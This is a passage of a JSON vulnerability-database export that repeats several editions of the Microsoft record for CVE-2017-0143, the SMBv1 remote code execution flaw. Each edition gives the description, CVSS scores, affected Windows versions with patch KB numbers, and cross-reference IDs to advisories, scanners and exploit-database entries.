SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-14T02:48:57", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012598", "KB3210721", "KB4013429", "KB4012212", "KB3205409", "KB4012606", "KB4012216", "KB4012217", "KB4012215", "KB3205401", "KB4013198", "KB3212646", "KB4012213", "KB3210720", "KB3177186", "KB3213986", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T02:48:57", "differentElements": ["msAffectedSoftware"], "edition": 45}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-14T04:52:34", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-14T04:52:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-14T04:52:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB3210721", "KB3177186", "KB4013198", "KB3213986", "KB4012217", "KB3212646", "KB3205409", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB4012215", "KB4012214", "KB4012213", "KB4012216", "KB4013429", "KB4012212", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T04:52:34", "differentElements": ["msAffectedSoftware"], "edition": 46}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-16T11:28:55", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": 